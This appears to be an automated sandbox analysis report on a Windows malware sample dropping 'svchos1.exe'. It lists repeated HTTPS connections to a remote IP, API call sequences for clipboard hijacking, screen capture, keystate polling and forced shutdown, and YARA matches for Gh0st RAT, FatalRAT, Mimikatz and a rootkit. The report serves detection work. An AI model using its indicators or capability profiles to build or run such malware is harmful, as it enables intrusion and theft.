Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50342
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown	Network traffic detected: HTTP traffic on port 50352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 50289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown	Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50419 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 50442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50367
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50371
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50370
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 50444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 50384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 50394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 50454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50409 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 50434 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50422 -> 443

Source: unknown	HTTPS traffic detected: 111.170.25.41:443 -> 192.168.2.11:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.170.25.41:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 111.170.25.41:443 -> 192.168.2.11:49710 version: TLS 1.2

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03832770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,

28_2_03832770

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03832770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	28_2_03832770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038326B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	28_2_038326B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038329D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	28_2_038329D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03846F10 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	28_2_03846F10
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03142770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	33_2_03142770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031426B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	33_2_031426B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031429D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	33_2_031429D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03156F10 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	33_2_03156F10

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03832770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,

28_2_03832770

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_016F1270 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,ReleaseDC,CreateCompatibleBitmap,ReleaseDC,DeleteDC,SelectObject,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,ReleaseDC,

28_2_016F1270

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_002A2147 GetClientRect,GetAsyncKeyState,SendMessageW,SetScrollPos,

28_2_002A2147

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002A9126 SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,	28_2_002A9126
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002ED626 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	28_2_002ED626
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0031D6B9 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,	28_2_0031D6B9
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_002B179E IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	28_2_002B179E

Source: conhost.exe

Process created: 49

System Summary

Malicious sample detected (through community Yara rule)

Source: 33.2.svchos1.exe.323cd38.5.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.37ed6bc.2.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.392cd38.6.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.30fd6bc.2.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.324c380.4.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.37fcd04.4.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.393c380.5.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.37ed6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.37ed6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.37ed6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.310cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 33.2.svchos1.exe.310cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 33.2.svchos1.exe.310cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.323cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 33.2.svchos1.exe.323cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 33.2.svchos1.exe.323cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.324c380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 33.2.svchos1.exe.324c380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 33.2.svchos1.exe.324c380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.393c380.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.393c380.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.393c380.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.37fcd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.37fcd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.37fcd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.310cd04.1.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.30fd6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 33.2.svchos1.exe.30fd6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 33.2.svchos1.exe.30fd6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.392cd38.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.392cd38.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.392cd38.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE	Matched rule: Detects FatalRAT Author: ditekSHen
Source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE	Matched rule: Detects FatalRAT Author: ditekSHen

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_0383E680: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,

28_2_0383E680

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_038401A0 AttachConsole,AttachConsole,Sleep,AttachConsole,GetConsoleProcessList,GetConsoleProcessList,GetConsoleProcessList,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,FreeConsole,FreeConsole,Sleep,FreeConsole,TerminateProcess,_swprintf,SHDeleteKeyA,OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryA,GetSystemDirectoryA,lstrcat,lstrcat,DeleteFileA,DeleteFileA,GetSystemDirectoryA,lstrcat,DeleteFileA,LocalFree,free,free,free,GetWindowsDirectoryA,GetCurrentProcess,IsWow64Process,DeleteFileA,SetServiceStatus,ExitProcess,

28_2_038401A0

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0383E680 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,	28_2_0383E680
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03840650 ExitWindowsEx,	28_2_03840650
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03150650 ExitWindowsEx,	33_2_03150650
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0314E680 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,	33_2_0314E680

Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F82214	9_3_02F82214
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F7C1B4	9_3_02F7C1B4
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F81EB4	9_3_02F81EB4
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F71E2C	9_3_02F71E2C
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F71E2B	9_3_02F71E2B
Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: 9_3_02F75D60	9_3_02F75D60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BCB4A0	12_2_02BCB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BC2099	12_2_02BC2099
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_02BCB499	12_2_02BCB499
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_028FB490	22_2_028FB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_08143E98	22_2_08143E98
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00376073	28_2_00376073
